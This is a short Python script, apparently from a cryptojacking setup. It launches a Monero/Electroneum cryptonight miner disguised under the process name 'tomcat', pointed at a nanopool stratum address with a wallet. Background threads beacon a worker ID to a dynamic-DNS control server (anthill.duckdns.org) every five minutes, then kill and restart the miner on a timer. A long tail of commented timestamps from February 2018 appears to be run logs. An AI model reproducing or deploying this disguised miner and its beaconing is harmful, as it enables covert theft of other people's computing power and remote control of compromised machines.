import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:53:06.854532
#2018-02-17 16:41:06.658632
#2018-02-17 18:28:06.861888
#2018-02-17 20:18:01.501671
#2018-02-17 22:04:06.878563
#2018-02-17 23:48:06.322304
#2018-02-18 01:37:03.913915
#2018-02-18 03:24:05.991859
#2018-02-18 05:12:01.280194
#2018-02-18 07:04:01.242187
#2018-02-18 08:52:07.024575
#2018-02-18 10:39:05.806862
#2018-02-18 12:24:02.046998
#2018-02-18 14:12:01.659435
#2018-02-18 16:02:05.842358
#2018-02-18 17:52:07.595747
#2018-02-18 19:39:02.233080
#2018-02-18 21:24:01.444877
#2018-02-18 23:12:07.149986
#2018-02-19 00:58:06.368688
#2018-02-19 02:46:06.147311
#2018-02-19 04:32:05.487689
#2018-02-19 06:17:01.722493
#2018-02-19 08:05:07.643701
#2018-02-19 09:55:04.459992
#2018-02-19 11:44:09.511250
#2018-02-19 13:31:05.631077
#2018-02-19 15:19:01.756821
#2018-02-19 17:06:07.868938
#2018-02-19 18:53:03.944679
#2018-02-19 20:41:04.319037
#2018-02-19 22:27:06.337169
#2018-02-20 00:13:03.954361
#2018-02-20 02:01:05.538434
#2018-02-20 03:51:06.521677
#2018-02-20 05:35:01.481602
#2018-02-20 07:19:01.872896
#2018-02-20 09:05:09.384920
#2018-02-20 10:48:01.760032
#2018-02-20 12:34:05.278772
#2018-02-20 14:21:05.981520
#2018-02-20 16:07:05.077055
#2018-02-20 17:53:04.924808
#2018-02-20 19:43:06.104486
#2018-02-20 21:31:08.726793
#2018-02-20 23:15:05.152326
#2018-02-21 00:59:01.908891
#2018-02-21 02:46:01.736713
#2018-02-21 04:31:07.394691
#2018-02-21 06:18:02.026729
#2018-02-21 08:04:03.647210
#2018-02-21 09:50:05.436448
#2018-02-21 11:38:08.473787
#2018-02-21 13:28:05.608739
#2018-02-21 15:13:04.613633
#2018-02-21 17:04:06.185680
#2018-02-21 18:52:01.811248
#2018-02-21 20:41:04.541012
#2018-02-21 22:26:04.096590
#2018-02-22 00:15:09.972300
#2018-02-22 02:04:04.473713
#2018-02-22 03:50:04.776404
#2018-02-22 05:37:01.898384
#2018-02-22 07:22:04.899599
#2018-02-22 09:09:07.668046
#2018-02-22 10:57:02.199918
#2018-02-22 12:43:12.507291
#2018-02-22 14:30:08.896857
#2018-02-22 16:17:06.533227
#2018-02-22 18:05:08.584284
#2018-02-22 19:53:08.703002
#2018-02-22 21:41:05.356411
#2018-02-22 23:28:01.868920
#2018-02-23 01:16:01.733940
#2018-02-23 03:02:07.591082
#2018-02-23 04:47:04.284889
#2018-02-23 06:32:04.980477
#2018-02-23 08:18:07.470769
#2018-02-23 10:36:04.552226
#2018-02-23 12:31:07.814505
#2018-02-23 14:18:07.660849
#2018-02-23 16:09:04.910127
#2018-02-23 17:54:05.935908
#2018-02-23 19:40:07.216641
#2018-02-23 21:23:08.861827
#2018-02-23 23:11:06.316860
#2018-02-24 00:53:07.527990
#2018-02-24 02:49:05.283837
#2018-02-24 04:39:04.216772
#2018-02-24 06:23:05.088273
#2018-02-24 08:10:07.293505
#2018-02-24 09:56:01.638693
#2018-02-24 11:51:03.629222
#2018-02-24 13:43:01.991704
#2018-02-24 15:32:05.763509
#2018-02-24 17:26:05.393518
#2018-02-24 19:13:01.574533
#2018-02-24 21:00:09.280484
#2018-02-24 23:32:01.318477
#2018-02-25 03:38:03.271915
#2018-02-25 07:16:04.161439